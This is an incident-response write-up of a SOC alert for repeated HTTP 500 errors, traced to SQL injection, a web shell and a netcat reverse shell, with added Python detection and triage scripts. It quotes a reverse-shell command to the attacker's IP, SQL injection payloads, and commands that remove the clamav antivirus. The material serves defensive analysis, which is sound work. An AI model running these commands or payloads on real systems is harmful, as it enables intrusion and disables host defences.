The HTTP response status code is how the web server tells you what is going on. A 200 means everything went well. A 301? You’re being redirected.
But a 500? It usually means the back-end server hit an error. Multiple 500 responses from the same source, though? That’s something worth looking at, because a client repeatedly breaking the back end is often probing it.
In this write-up, we’ll take a look at a case where multiple 500 responses were generated on a server.
Case Details
- Event Time: April 18, 2021, 1 p.m.
- EventID: 89
- Rule: SOC142 — Multiple HTTP 500 Response
- Level: Security Analyst
- Source Address: 101.32.223.119
- Source Hostname: 101.32.223.119
- Destination Address: 172.16.20.6
- Destination Hostname: SQLServer
- Username: www-data
- Request URL: https://172.16.20.6/userNumber=1 AND (SELECT * FROM Users) = 1
- User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
- Device Action: Allowed
Analysis
- Source address: 101.32.223.119
- Destination address: 172.16.20.6
- Looking up the destination address in Endpoint Management, the target was our SQL server.
- Let’s see if the source IP was flagged as malicious on VirusTotal.
- The IP was flagged as malicious by 5 vendors. Anything flagged as malicious by several security vendors deserves extra caution, so we treat this source as hostile until proven otherwise.
Logs
- We can search for the source address and the destination address in Log Management.
- We see a lot of entries, and if we inspect one of them, it looks like they were attempting SQL injection against the request parameter.
- At entry 392, it seems that they managed to upload a web shell.
- And in the last entry, it seems they managed to achieve remote code execution.
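The alert rule in this case fires on repeated 500 responses from one source. The following is an added example (not from the original write-up or from any SIEM product) of how that detection logic can be expressed: it parses constructed access-log lines in the common NCSA format, flags any source address that produces a threshold number of 500 responses inside a sliding window, and separately lists requests whose decoded URL carries a SQL-injection-looking payload. The sample log lines, threshold and window size are assumptions; only the source and destination addresses come from the case details.

```python
"""Detection logic for a "Multiple HTTP 500 Response" style rule.

Added example, not part of the original write-up. The log lines below are
constructed; the addresses match the case, the requests do not claim to be
the real ones.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import unquote

# Common (NCSA) access-log format: src ident user [ts] "METHOD url PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Loose SQL-injection heuristics, deliberately simple; tune for your application.
SQLI_RE = re.compile(
    r"(?i)(\bunion\b|\bselect\b.+\bfrom\b|\bor\b\s+\d+=\d+|\band\b\s*\(select)"
)

# Constructed sample lines (assumption: not taken from the original page).
SAMPLE_LOG = """\
101.32.223.119 - - [18/Apr/2021:13:00:01 +0000] "GET /?userNumber=1 HTTP/1.1" 200 512
101.32.223.119 - - [18/Apr/2021:13:00:03 +0000] "GET /?userNumber=1' HTTP/1.1" 500 0
101.32.223.119 - - [18/Apr/2021:13:00:05 +0000] "GET /?userNumber=1%20AND%20(SELECT%20*%20FROM%20Users)=1 HTTP/1.1" 500 0
101.32.223.119 - - [18/Apr/2021:13:00:08 +0000] "GET /?userNumber=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 0
10.0.0.5 - - [18/Apr/2021:13:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024
10.0.0.5 - - [18/Apr/2021:13:00:10 +0000] "GET /missing HTTP/1.1" 500 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {
        "src": m["src"],
        "ts": ts,
        "url": unquote(m["url"]),  # decode %20 etc. before pattern matching
        "status": int(m["status"]),
    }


def find_500_bursts(lines, threshold=3, window=timedelta(minutes=5)):
    """Return {src: peak_count} for sources with >= threshold 500s inside window."""
    recent = defaultdict(deque)  # per-source timestamps of recent 500s
    flagged = {}
    for rec in filter(None, map(parse_line, lines)):
        if rec["status"] != 500:
            continue
        q = recent[rec["src"]]
        q.append(rec["ts"])
        # Drop timestamps that fell out of the sliding window.
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["src"]] = max(flagged.get(rec["src"], 0), len(q))
    return flagged


def sqli_requests(lines):
    """Return (src, decoded_url) pairs whose URL matches the SQLi heuristics."""
    return [
        (r["src"], r["url"])
        for r in filter(None, map(parse_line, lines))
        if SQLI_RE.search(r["url"])
    ]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("500 bursts:", find_500_bursts(lines))
    for src, url in sqli_requests(lines):
        print("SQLi-looking request:", src, url)
```

The two checks are kept separate on purpose: a burst of 500s alone is often an application bug, and a single SQLi-looking URL alone may be a scanner that never got anywhere, but the same source tripping both within minutes is the pattern this case shows and is the one worth escalating.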
Endpoint Management
- Let’s search for the destination address.
- It is indeed our SQL server. Let’s look at the command history.
- If we look for the entries between 13:01 and 13:05, these look fishy.
- If you don’t know, `nc` is the command for netcat. Netcat is a networking utility used to establish TCP or UDP connections.
`nc 101.32.223.119 1234 -e /bin/sh`
- So it’s connecting to the source address on port 1234, and `-e /bin/sh` runs sh, which is a shell. As the netcat help text puts it:
`-e filename specify filename to exec after connect (use with caution).`
- Now let’s see if there were any network connections made to that IP.
- Looks like it indeed connected to the IP, so our SQL server was compromised.
- Let’s look now at the process list to see if they started any weird process other than the netcat connection.
- I’m not sure what it’s deleting, but I know for sure `clamav` is a free and open source antivirus program usually used on Linux. Deleting it is a bit suspicious.
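The two endpoint indicators called out above, a netcat invocation that hands a shell to a remote host and the removal of the host’s antivirus, are easy to miss when scrolling a long command history. The following is an added example (not from the original write-up or from any EDR product) of a small triage pass over history entries that tags exactly those two patterns. The history lines are constructed; the timestamps mimic the 13:01 to 13:05 window discussed, the netcat command is the one from the page, and the package-removal and `rm` commands are assumptions standing in for whatever deleted clamav on the real host.

```python
"""Triage of an endpoint's command history for the indicators in the case:
netcat executing a shell toward a public IP, and removal of clamav.

Added example, not part of the original write-up. SAMPLE_HISTORY is constructed.
"""
import shlex
from ipaddress import ip_address

NETCAT_BINS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "sh", "bash", "dash"}
AV_PACKAGES = {"clamav", "clamav-daemon", "clamav-freshclam", "clamav-base"}
# Package managers and the subcommands that uninstall software.
REMOVAL_CMDS = {
    "apt": {"remove", "purge"},
    "apt-get": {"remove", "purge"},
    "yum": {"remove"},
    "dnf": {"remove"},
}

# Constructed (time, user, command) entries; only the nc line comes from the page.
SAMPLE_HISTORY = [
    ("13:01", "www-data", "whoami"),
    ("13:02", "www-data", "nc 101.32.223.119 1234 -e /bin/sh"),
    ("13:03", "www-data", "ls -la /var/www"),
    ("13:04", "root", "apt-get remove -y clamav"),
    ("13:05", "root", "rm -rf /var/lib/clamav"),
]


def _is_public_ip(token):
    """True if token parses as a globally routable IP address."""
    try:
        return ip_address(token).is_global
    except ValueError:
        return False


def classify(cmd):
    """Return indicator tags for one command line (empty list if nothing matched)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable"]  # unbalanced quotes; still worth a human look
    if not argv:
        return []
    tags = []
    prog = argv[0].rsplit("/", 1)[-1]  # strip any path prefix, e.g. /usr/bin/nc
    args = argv[1:]

    if prog in NETCAT_BINS:
        # -e / -c hand the connection to a program; a shell there is the reverse-shell pattern.
        if any(a in ("-e", "-c") for a in args) and any(a in SHELLS for a in args):
            tags.append("netcat_exec_shell")
        if any(_is_public_ip(a) for a in args):
            tags.append("netcat_to_public_ip")

    if prog in REMOVAL_CMDS and any(a in REMOVAL_CMDS[prog] for a in args) \
            and any(a in AV_PACKAGES for a in args):
        tags.append("antivirus_removed")

    if prog == "rm" and any("clamav" in a for a in args):
        tags.append("antivirus_files_deleted")

    return tags


def triage(history):
    """Return only the history entries that carry at least one indicator tag."""
    findings = []
    for ts, user, cmd in history:
        tags = classify(cmd)
        if tags:
            findings.append((ts, user, cmd, tags))
    return findings


if __name__ == "__main__":
    for ts, user, cmd, tags in triage(SAMPLE_HISTORY):
        print(f"{ts} {user:9} {', '.join(tags):40} {cmd}")
```

Matching on the parsed argument vector rather than on a substring avoids false positives such as a script that merely mentions `nc` in a comment, and the public-IP check is what separates a suspicious outbound netcat from the legitimate local use (`nc -z localhost 5432`) that database hosts often see.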
Final Verdict
- From all the evidence we collected, we can confirm that an attacker leveraged a SQL injection vulnerability on the SQL server to compromise it. The threat actor used the vulnerability to upload a web shell, through which they were able to perform remote code execution on the server, and from there opened a netcat reverse connection back to their own address. This is a true positive.